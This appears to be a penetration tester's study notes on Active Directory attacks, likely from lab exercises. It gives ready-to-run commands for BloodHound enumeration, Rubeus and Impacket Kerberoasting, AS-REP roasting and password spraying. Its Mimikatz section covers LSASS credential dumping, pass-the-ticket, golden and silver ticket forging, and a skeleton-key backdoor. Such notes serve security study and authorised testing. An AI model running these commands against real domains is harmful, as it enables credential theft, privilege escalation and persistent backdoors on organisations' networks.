= Active Directory

== BloodHound
Tool that uses graph theory (with Neo4j) to reveal hidden/unintended relationships within an Active Directory or Azure environment.

Useful to find highly complex attack paths.

=== Sharphound
Similar to PowerView but collects users, groups, trusts etc in json files to be used inside BloodHound.

Must be uploaded to the target machine.

[source, shell]
----
powershell -ep bypass
. .\SharpHound.ps1
(bloodhound v2) Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
(bloodhound v3) .\SharpHound.exe -c all -d CONTROLLER.local --zipfilename loot3.zip
----
Now retrieve the zip file and import it in bloodhound.

== Rubeus
Adaptation of kekeo tool, developped by HarmJ0y. Features: overpass the hash, ticket requests and renewal, ticket management, ticket extraction, harvesting, pass the ticket, AS-REP roasting, and Kerberoasting.

https://github.com/GhostPack/Rubeus[Github - Rubeus] must be compiled and sent to the target machine.

=== Harvesting tickets
`Rubeus.exe harvest /interval:30`

=== Brute-forcing / password-spraying
Brute-force: use a single user account and a wordlist of passwords

Password spraying: use a single password and spray against all found user accounts in the domain to find which one may have that password

The following attack will take a given Kerberos-based password and spray it against all found users and give a .kirbi ticket. This ticket is a TGT that can be used in order to get service tickets from the KDC as well as to be used in attacks like the pass the ticket attack.

`Rubeus.exe brute /password:Password1 /noticket`

This take a given password and spray it against all found users then give the .kirbi TGT for that user.

We need to be mindful of how we use this attack as it may lock us out of the network depending on the account lockout policies.

=== Kerberoasting
Allows a user to request a service ticket for any service with a registered SPN then use that ticket to crack the service password.

Requirements:

* service must have a registered SPN
* weak password
* trackable
* privilege of the cracked service account

Use tool like `BloodHound` to find all Kerberoastable accounts. Other tools: `Rubeus`, `Impacket`, `Kekeo`, `Invoke-Kerberoast`.

`Rubeus.exe kerberoast` will dump the Kerberos hash of any kerberoastable users. We can then try to crack this hash with hashcat.

`hashcat -m 13100 -a 0 hash.txt Pass.txt`

=== AS-REP Roasting
Similar to Kerberoasting, AS-REP dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting, these users do not have to be service accounts. The only requirement to be able to AS-REP roast a user is the user must have pre-authentication disabled.

Rubeus is easier to use because it automatically finds AS-REP Roastable users whereas with GetNPUsers you have to enumerate the users beforehand and know which users may be AS-REP Roastable.

`Rubeus.exe asreproast`

To use hashcat (18200), we need to add 23$ after $krb5asrep$

== Impacket
Collection of Python classes for working with network protocols. This doesn't have to be executed on the target machine.

* IP, TCP, UDP, ...
* IPv4, IPv6
* SMB
* plain, NTLM, Kerberos authentication
* LDAP, ...

=== Kerberoasting
`GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.110.253 -request` will dump the hash that we can try to crack with hashcat (13100).

== Kerbrute
Brute force discovery of users, passwords and password spray.

`kerbrute userenum userlist.txt --dc 10.10.188.91 --domain spookysec.local`

== Evil-winRM
https://github.com/Hackplayers/evil-winrm[tool]

== Mimikatz
https://github.com/gentilkiwi/mimikatz[tool] that allows users to view and save authentication credentials like kerberos tickets. Useful to stel credentials and escalate privileges.

Most commonly used for dumping user credentials inside of an active directory network; dump TGT from LSASS memory.

Can use methods like

* pass the hash: use the hash directly to login
* pass the ticket: pass kerberos ticket to login
* pass the key: pass unique key to impersonate a user
* kerberos golden ticket: specific ticket for hidden account KRBTGT which is the account that encrypts all of the other tickets. Doesn't expire.
* kerberos silver ticket: kerberos grants TGS ticket and a user can use that ticket to log into any services on the network
* pass the cache: same as pass the ticket but for login data on mac/linux

=== Passwords hashes
[source, shell]
----
mimikatz.exe
privilege::debug
lsadump::lsa /patch
----
then `hashcat -m 1000 <hash> rockyou.txt`

=== Pass the ticket
Dump TGT from LSASS memory of the machine. The Local Security Authority Subsystem Service (LSASS) is a memory process that stores credentials on an active directory server and can store Kerberos ticket along with other credential types to act as the gatekeeper and accept or reject the credentials provided.

When we dump the tickets with mimikatz, it will give us a .kirbi ticket which can be used to gain domain admin if a domain admin ticket is in the LSASS memory. This ticket can then be used in Pass the ticket attack.

Mimikatz must be on the target machine.

[source, shell]
----
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
kerberos::ptt <ticket>
----

=== Golden/Silver ticket
A silver ticket can sometimes be better used in engagements rather than a golden ticket because it is a little more discreet.

Silver ticket is limited to the service that is targeted whereas a golden ticket has access to any Kerberos service.

A specific use scenario for a silver ticket would be that we want to access the domain's SQL server however our current compromised user does not have access to that server. We can find an accessible service account to get a foothold with by kerberoasting that service, we can then dump the service hash and then impersonate their TGT in order to request a service ticket for the SQL service from the KDC allowing us access to the domain's SQL server.

[source, shell]
----
mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
lsadump::lsa /inject /name:Administrator
lsadump::lsa /inject /name:SQLService
----

This dumps the hash as well as security identifier to create a golden ticket. To create a silver ticket, we need to change the /name to dump the hash of either a domain admin account or a service account such as the SQLService account.

Create a golden ticket with the info found in lsadump. 500 is the Administrator ID
[source, shell]
----
Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:

Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500
----

For a silver ticket, we need to put a service NTLM hash into krbtgt slot, the sid of the service account and the id to 1103.

To use the ticket
[source, shell]
----
misc::cmd
----

Golden ticket has access to everything, silver ticket only has access to the service it is linked with.

=== Kerberos backdoors
Use mimikatz for backdoors because more subtle than golden/silver tickets; it acts similar to a rootkit by implanting itself into the memory of the domain forest allowing itself access to any of the machines with a master password.

This works by implanting a skeleton key that abuses the way that the AS-REQ validates encrypted timestamps. A skeleton key only works using Kerberos RC4 encryption.

The default hash for a mimikatz skeleton key is 60BA4FCADC466C7A033C178194C03DF6 which makes the password -"mimikatz"

Once a skeleton key is implanted, the domain controller tries to decrypt the timestamp using both the user NT hash and the skeleton key NT hash allowing you access to the domain forest.

Target machine:
[source, shell]
----
mimikatz.exe
privilege::debug
misc::skeleton
----

Attacker machine:
[source, shell]
----
net use c:\\DOMAIN-CONTROLLER\admin$ /usr:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatz
----
Share now accessible without the need for the Administrator password and we can access directory of Desktop-1 without ever knowing what users have access to Desktop-1

The skeleton key runs in the memory (no persistence) but can be scripted or persisted using other tools and techniques.

== Kekeo

== Invoke-Kerberoast

== PowerView (PowerSploit)
Collection of Microsoft PowerShell modules for pen testers.

Powerview is a powerful powershell script from powershell empire that can be used for enumerating a domain after we have already gained a shell in the system.

Powerview needs to be uploaded on the target machine.

Load PowerView
[source, bash]
----
powershell -ep bypass
. .\PowerView.ps1
----

Enumerate domain users
[source, bash]
----
Get-NetUser | select cn
----

Enumerate domain groups
[source, bash]
----
Get-NetGroup -GroupName *admin*
----

Find shares
[source, bash]
----
Invoke-ShareFinder
----

Find operating systems on the network
[source, bash]
----
Get-NetComputer -fulldata | select operatingsystem
----

=== Links

* https://github.com/PowerShellMafia/PowerSploit/tree/dev[Github - PowerView]
* https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993[PowerView - tricks]
* https://www.noobsec.net/powerview-cheatsheet/[PowerView - cheatsheet]